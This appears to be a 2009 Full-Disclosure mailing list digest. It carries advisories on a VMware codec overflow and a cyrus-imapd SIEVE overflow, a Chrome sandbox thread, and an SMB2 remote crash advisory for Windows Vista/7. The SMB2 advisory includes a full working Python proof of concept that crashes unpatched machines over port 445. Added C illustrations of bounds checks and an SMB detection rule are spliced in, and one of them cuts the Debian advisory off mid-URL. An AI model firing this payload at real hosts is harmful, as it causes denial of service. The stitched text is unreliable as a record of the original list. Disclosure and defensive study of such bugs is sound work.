[Full-disclosure] DefCon 17 CTF packet captures online

2009-09-07 Thread Holt Sorenson
We have just finished the last bits in getting the DefCon
17 CTF packet captures online. Snag them from:

http://ddtek.biz/

<3 ur sheep and mom too,
ddtek

-- 
Holt Sorenson
h...@nosneros.net
www.nosneros.net/hso

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Secunia Research: VMWare VMnc Codec Mismatched Dimensions Buffer Overflow

2009-09-07 Thread Secunia Research
== 

 Secunia Research 07/09/2009

  - VMWare VMnc Codec Mismatched Dimensions Buffer Overflow -

== 
Table of Contents

Affected Software ................................. 1
Severity .......................................... 2
Vendor's Description of Software .................. 3
Description of Vulnerability ...................... 4
Solution .......................................... 5
Time Table ........................................ 6
Credits ........................................... 7
References ........................................ 8
About Secunia ..................................... 9
Verification ...................................... 10

== 
1) Affected Software 

* VMWare Workstation version 6.5.2 build 156735.

NOTE: Other products and versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System access
Where:  Remote

== 
3) Vendor's Description of Software 

"VMware Workstation makes it simple to create and run multiple virtual
machines on your desktop or laptop computer. ... You can even use 
Workstation 6.5 to record and play video files ..."

Product Link:
http://www.vmware.com/products/ws/

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in various VMWare 
products, which can be exploited by malicious people to compromise a 
user's system.

The vulnerability is caused due to a boundary error in the VMnc codec
(vmnc.dll) and can be exploited to cause a heap-based buffer overflow
via a specially crafted video file with mismatched dimensions.

Successful exploitation may allow execution of arbitrary code.

== 
5) Solution 

Update to version 6.5.3 build 185404.

== 
6) Time Table 

30/04/2009 - Vendor notified.
30/04/2009 - Vendor response.
21/08/2009 - Patched VMware Workstation, Player, and ACE released.
04/09/2009 - Patched VMware Workstation Movie Decoder released.
07/09/2009 - Public disclosure.

== 
7) Credits 

Discovered by Alin Rad Pop, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-0199 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-25/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==

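
The advisory states only the cause: a heap-based overflow when the dimensions in a crafted video file do not agree with each other. As an added illustration (not Secunia's or VMware's code, and not the logic of vmnc.dll itself), the constructed decoder fragment below shows the check such a codec needs: the frame buffer is allocated once from the header dimensions, and every later update rectangle is validated against those dimensions with overflow-safe arithmetic before a single byte is copied. The `framebuf` and `rect` types, the one-byte-per-pixel model, the sample payload and all function names are assumptions made for this illustration.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Frame buffer allocated once from the dimensions declared in the stream
 * header. One byte per pixel keeps the arithmetic simple (constructed
 * model, not the VMnc pixel format). */
typedef struct {
    uint32_t width, height;
    uint8_t *pixels;            /* width * height bytes */
} framebuf;

/* Update rectangle carried inside a frame. In a crafted file nothing
 * forces these values to agree with the header; a decoder that copies
 * w*h bytes into the buffer without the check below overflows the heap. */
typedef struct {
    uint32_t x, y, w, h;
} rect;

bool framebuf_init(framebuf *fb, uint32_t width, uint32_t height)
{
    /* Reject zero sizes and width*height products that would wrap. */
    if (width == 0 || height == 0 || width > UINT32_MAX / height)
        return false;
    fb->pixels = calloc((size_t)width * height, 1);
    if (fb->pixels == NULL)
        return false;
    fb->width = width;
    fb->height = height;
    return true;
}

void framebuf_free(framebuf *fb)
{
    free(fb->pixels);
    fb->pixels = NULL;
    fb->width = fb->height = 0;
}

/* True only if the rectangle lies entirely inside the allocated frame.
 * Subtraction (width - x) instead of addition (x + w) avoids wrapping
 * when x or w is near UINT32_MAX. */
bool rect_fits(const framebuf *fb, const rect *r)
{
    if (r->w == 0 || r->h == 0)
        return false;
    if (r->x > fb->width || r->w > fb->width - r->x)
        return false;
    if (r->y > fb->height || r->h > fb->height - r->y)
        return false;
    return true;
}

/* Copy a w*h block of pixel data into the frame at (x, y).
 * Returns false and writes nothing if the rectangle does not fit the
 * header dimensions or the frame carries fewer bytes than it claims. */
bool apply_update(framebuf *fb, const rect *r, const uint8_t *data, size_t data_len)
{
    if (!rect_fits(fb, r))
        return false;
    /* w*h <= width*height here, so the product cannot wrap. */
    if (data_len < (size_t)r->w * r->h)
        return false;
    for (uint32_t row = 0; row < r->h; row++) {
        uint8_t *dst = fb->pixels + (size_t)(r->y + row) * fb->width + r->x;
        memcpy(dst, data + (size_t)row * r->w, r->w);
    }
    return true;
}

int main(void)
{
    framebuf fb;
    uint8_t data[64];                         /* constructed frame payload */
    memset(data, 0xAB, sizeof data);
    if (!framebuf_init(&fb, 16, 8))
        return 1;
    rect good = { 2, 1, 8, 4 };               /* fits inside 16x8 */
    rect bad  = { 0, 0, 32, 2 };              /* wider than the header says */
    printf("good update: %s\n", apply_update(&fb, &good, data, sizeof data) ? "applied" : "rejected");
    printf("bad update:  %s\n", apply_update(&fb, &bad, data, sizeof data) ? "applied" : "rejected");
    framebuf_free(&fb);
    return 0;
}
```

The two places where a real decoder goes wrong are both covered: the allocation refuses a width*height product that wraps, and the per-frame copy refuses a rectangle whose extent (checked by subtraction, so that a huge x or w cannot wrap back into range) is outside the buffer it was allocated for.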


[Full-disclosure] [SECURITY] [DSA 1881-1] New cyrus-imapd packages fix arbitrary code execution

2009-09-07 Thread Nico Golde
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA-1881-1                    secur...@debian.org
http://www.debian.org/security/                                 Nico Golde
September 7th, 2009                    http://www.debian.org/security/faq
- --

Package: cyrus-imapd-2.2
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID : none assigned yet

It was discovered that the SIEVE component of cyrus-imapd, a highly scalable
enterprise mail system, is vulnerable to a buffer overflow when processing
SIEVE scripts.  Due to incorrect use of the sizeof() operator an attacker is
able to pass a negative length to snprintf() calls resulting in large positive
values due to integer conversion.  This causes a buffer overflow which can be
used to elevate privileges to the cyrus system user.  An attacker who is able
to install SIEVE scripts executed by the server is therefore able to read and
modify arbitrary email messages on the system.


For the oldstable distribution (etch), this problem has been fixed in
version 2.2.13-10+etch2.

For the stable distribution (lenny), this problem has been fixed in
version 2.2.13-14+lenny1.

For the testing (squeeze) and unstable (sid) distribution, this problem
will be fixed soon.


We recommend that you upgrade your cyrus-imapd-2.2 packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Debian (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-imapd-2.2_2.2.13-10+etch2.diff.gz
  Size/MD5 checksum: 258553 dcbaf7e6c1f9ce896d2b2e75215797bd
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-imapd-2.2_2.2.13-10+etch2.dsc
  Size/MD5 checksum: 1298 7eac896a46888f98ab76fd6287c5eb2f
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-imapd-2.2_2.2.13.orig.tar.gz
  Size/MD5 checksum: 2109770 3ff679714836d1d7b1e1df0e026d4844

Architecture independent packages:

http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-doc-2.2_2.2.13-10+etch2_all.deb
  Size/MD5 checksum: 226846 45903c38c5442ab0bc393b09a374d28c
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-admin-2.2_2.2.13-10+etch2_all.deb
  Size/MD5 checksum: 80188 0fee8aa188fca06ca24f905e437f3621

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-murder-2.2_2.2.13-10+etch2_alpha.deb
  Size/MD5 checksum: 1207538 1c4cc5eb3f83d0586e9ac3d7f0881a32
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-imapd-2.2_2.2.13-10+etch2_alpha.deb
  Size/MD5 checksum: 1007132 7bcdb4a2bf9aff702bfa0ebb9708bc56
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-clients-2.2_2.2.13-10+etch2_alpha.deb
  Size/MD5 checksum: 138358 acdcfa535f091c083e3c10136c033958
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/libcyrus-imap-perl22_2.2.13-10+etch2_alpha.deb
  Size/MD5 checksum: 197654 f7305fa014e8b137efbc8e6dad92bd81
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-nntpd-2.2_2.2.13-10+etch2_alpha.deb
  Size/MD5 checksum: 649710 46733c9a34e7df4ef49a91037f6e667d
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-dev-2.2_2.2.13-10+etch2_alpha.deb
  Size/MD5 checksum: 302254 ff005ebe300d0b94233c335300ed7f51
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-pop3d-2.2_2.2.13-10+etch2_alpha.deb
  Size/MD5 checksum: 297038 0c57dae1e59453a42263338c8d4fb4bf
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-common-2.2_2.2.13-10+etch2_alpha.deb
  Size/MD5 checksum: 6053052 0a5c3aaaf6774d38e4d016f207996d39

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-nntpd-2.2_2.2.13-10+etch2_amd64.deb
  Size/MD5 checksum: 612176 81da459bcdf3a79aeeb6db27ecdd8497
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-clients-2.2_2.2.13-10+etch2_amd64.deb
  Size/MD5 checksum: 132766 371d24b4e829b8f76795b209efdde682
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/libcyrus-imap-perl2
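
The DSA describes the bug class precisely: sizeof() applied to the wrong object yields a length that goes negative, and when that int reaches the size_t parameter of snprintf() the conversion turns it into a huge positive bound, so snprintf() no longer limits the write. The block below is an added illustration of that arithmetic and of the corrected pattern; it is not cyrus-imapd's SIEVE code and the buffer name, capacity and messages are constructed for the demo. The flawed function only reproduces the length computation and returns the value snprintf() would have received; it never performs the unbounded write.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define ERRBUF_CAPACITY 64   /* constructed buffer size for the demo */

/* The flawed pattern: errbuf arrives as a pointer parameter, so
 * sizeof(errbuf) is the size of a pointer (4 or 8), not the buffer's
 * capacity. As soon as the buffer already holds more than that many
 * characters the int result goes negative; passed to snprintf's size_t
 * parameter, the implicit conversion turns it into a huge positive
 * length and snprintf no longer bounds the write at all. This function
 * reproduces only the arithmetic and returns the value snprintf would
 * have received; it writes nothing. */
size_t flawed_remaining(const char *errbuf)
{
    int remaining = (int)sizeof(errbuf) - (int)strlen(errbuf);
    return (size_t)remaining;           /* the conversion snprintf performs */
}

/* The fix: the real capacity is passed in explicitly and the subtraction
 * is guarded so it can never underflow. */
size_t safe_remaining(const char *errbuf, size_t capacity)
{
    size_t used = strlen(errbuf);
    return used >= capacity ? 0 : capacity - used;
}

/* Append msg to a NUL-terminated errbuf of the given capacity.
 * Returns true if the whole message fitted, false if it was truncated;
 * either way the buffer stays NUL-terminated and within bounds. */
bool append_error(char *errbuf, size_t capacity, const char *msg)
{
    size_t used = strlen(errbuf);
    size_t room = safe_remaining(errbuf, capacity);
    if (room == 0)
        return false;
    int n = snprintf(errbuf + used, room, "%s", msg);
    return n >= 0 && (size_t)n < room;
}

int main(void)
{
    char errbuf[ERRBUF_CAPACITY] = "";
    append_error(errbuf, sizeof errbuf, "script error: line 1");   /* constructed */
    printf("used=%zu  flawed length=%zu  safe length=%zu\n",
           strlen(errbuf), flawed_remaining(errbuf),
           safe_remaining(errbuf, sizeof errbuf));
    return 0;
}
```

With 20 characters already in the buffer, flawed_remaining() returns a value in the billions (SIZE_MAX minus a few) on both 32-bit and 64-bit builds, which is exactly the "large positive values due to integer conversion" the advisory names; safe_remaining() returns 44. The general rule is the one the fix embodies: never derive a buffer bound from sizeof() of a pointer, pass the capacity alongside the pointer, and keep the subtraction unsigned and guarded.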

Re: [Full-disclosure] why not a sandbox

2009-09-07 Thread yersinia
On Sat, Sep 5, 2009 at 12:58 PM, Adrenalin  wrote:

> It seems like the plugins in Chrome are not in a sandbox
>
> "One additional, important area that is not covered by the sandbox are
> plugins like Flash. Restricting what plugins can do does not fit well with
> what users expect, which makes plugins a major vector for attack. Langley
> said that the plugin support on Linux is relatively new, but "our
> experience on Windows is that, in order for Flash to do all the things that
> various sites expect it to be able to do, the sandbox has to be so full of
> holes that it's rather useless". He is currently looking at SELinux as a
> way to potentially restrict plugins, but, for now, they are wide open. "
>
> Google's Chromium sandbox - http://lwn.net/Articles/347547/ (August 19,
> 2009)
>
> From design-documents page "It is also possible to run the plugin processes
> inside a sandbox target, using the --safe-plugins command line." hm
>
IMHO, if you want to go into a real, or almost real, sandbox you have to
execute with a MAC security policy. Something like
http://danwalsh.livejournal.com/13376.html

BTW, xguest is on Fedora 10/11. But a virtual machine could be better,
protected with svirt, of course. http://danwalsh.livejournal.com/30565.html


> On Sat, Sep 5, 2009 at 12:23 PM, BlackHawk  wrote:
>
>> doesn't chrome already run any single tab in a sandbox?
>>
>> http://dev.chromium.org/developers/design-documents/sandbox
>>

[Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-07 Thread laurent gaffie
=
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=

I. VULNERABILITY
-
Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-
Windows Vista and newer Windows versions come with a new SMB version named SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL
REQUEST functionality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to an SMB
server, and it is used to identify the SMB dialect that will be used for
further communication.

IV. PROOF OF CONCEPT
-

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field
# it dies with a PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-
An attacker can remotely crash, without any user interaction, any Vista/Windows
7 machine with SMB enabled.
Windows XP and 2k are NOT affected as they don't have this driver.

VI. SYSTEMS AFFECTED
-
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly Win Server
2008, as it uses the same SMB2.0 driver (not tested).

VII. SOLUTION
-
Vendor contacted, but no patch available for the moment.
Close the SMB feature and ports until a patch is provided.

VIII. REFERENCES
-
http://microsoft.com

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
http://g-laurent.blogspot.com/

X. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
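
From the defender's side, the single condition the advisory's PoC comment identifies (a NEGOTIATE PROTOCOL REQUEST whose "Process Id High" header field is not zero) is something a network sensor or a host-side filter can check for while the vendor patch is pending. The block below is an added example, not part of Laurent Gaffié's advisory or PoC: it parses the 4-byte NetBIOS session header and the 32-byte SMB header that the PoC bytes follow, validates the declared length and the SMB signature, and returns a verdict for NEGOTIATE requests. The field offsets are the standard SMB header layout (command at offset 4, Process ID High at offset 12, little-endian); the function and constant names and the 36-byte sample messages built by build_negotiate_header() are constructed for the demo and carry no negotiate body.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NBT_HDR_LEN 4            /* NetBIOS session service header */
#define SMB_HDR_LEN 32           /* fixed SMB header that follows it */
#define SMB_COM_NEGOTIATE 0x72   /* command byte of NEGOTIATE PROTOCOL REQUEST */

typedef enum {
    SMB_MALFORMED = -1,          /* not a well-formed SMB session message */
    SMB_OK = 0,                  /* nothing this rule objects to */
    SMB_SUSPICIOUS = 1           /* NEGOTIATE with a non-zero Process ID High */
} smb_verdict;

/* Header field offsets, relative to the 0xFF 'S' 'M' 'B' signature. */
enum { OFF_COMMAND = 4, OFF_PID_HIGH = 12 };

/* Inspect one session message: validate the NetBIOS length and the SMB
 * signature, then flag NEGOTIATE requests whose Process ID High field
 * is anything other than zero. */
smb_verdict check_smb_negotiate(const uint8_t *pkt, size_t len)
{
    if (len < NBT_HDR_LEN + SMB_HDR_LEN)
        return SMB_MALFORMED;
    if (pkt[0] != 0x00)                       /* session message type */
        return SMB_MALFORMED;
    uint32_t nbt_len = ((uint32_t)pkt[1] << 16) | ((uint32_t)pkt[2] << 8) | pkt[3];
    if (nbt_len < SMB_HDR_LEN || nbt_len + NBT_HDR_LEN > len)
        return SMB_MALFORMED;                 /* declared length does not fit */
    const uint8_t *hdr = pkt + NBT_HDR_LEN;
    static const uint8_t magic[4] = { 0xff, 'S', 'M', 'B' };
    if (memcmp(hdr, magic, sizeof magic) != 0)
        return SMB_MALFORMED;
    if (hdr[OFF_COMMAND] != SMB_COM_NEGOTIATE)
        return SMB_OK;                        /* rule only covers NEGOTIATE */
    uint16_t pid_high = (uint16_t)(hdr[OFF_PID_HIGH] | (hdr[OFF_PID_HIGH + 1] << 8));
    return pid_high != 0 ? SMB_SUSPICIOUS : SMB_OK;
}

/* Build a constructed 36-byte sample: NetBIOS header plus a bare SMB
 * NEGOTIATE header with the given Process ID High value and no body.
 * Returns the number of bytes written, 0 if out is too small. */
size_t build_negotiate_header(uint8_t *out, size_t out_len, uint16_t pid_high)
{
    if (out_len < NBT_HDR_LEN + SMB_HDR_LEN)
        return 0;
    memset(out, 0, NBT_HDR_LEN + SMB_HDR_LEN);
    out[3] = SMB_HDR_LEN;                     /* 24-bit big-endian length */
    uint8_t *hdr = out + NBT_HDR_LEN;
    hdr[0] = 0xff; hdr[1] = 'S'; hdr[2] = 'M'; hdr[3] = 'B';
    hdr[OFF_COMMAND] = SMB_COM_NEGOTIATE;
    hdr[OFF_PID_HIGH] = (uint8_t)(pid_high & 0xff);       /* little-endian */
    hdr[OFF_PID_HIGH + 1] = (uint8_t)(pid_high >> 8);
    return NBT_HDR_LEN + SMB_HDR_LEN;
}

int main(void)
{
    uint8_t pkt[NBT_HDR_LEN + SMB_HDR_LEN];
    build_negotiate_header(pkt, sizeof pkt, 0x0000);
    printf("pid_high=0x0000 -> %d\n", check_smb_negotiate(pkt, sizeof pkt));
    build_negotiate_header(pkt, sizeof pkt, 0x2600);   /* bytes 00 26, as in the PoC */
    printf("pid_high=0x2600 -> %d\n", check_smb_negotiate(pkt, sizeof pkt));
    return 0;
}
```

The rule is deliberately narrow: a legitimate client sends zero in Process ID High on its first NEGOTIATE, so a non-zero value there is a cheap, low-false-positive indicator to alert on, while the length and signature checks keep the parser itself from being confused by truncated or non-SMB data on port 445.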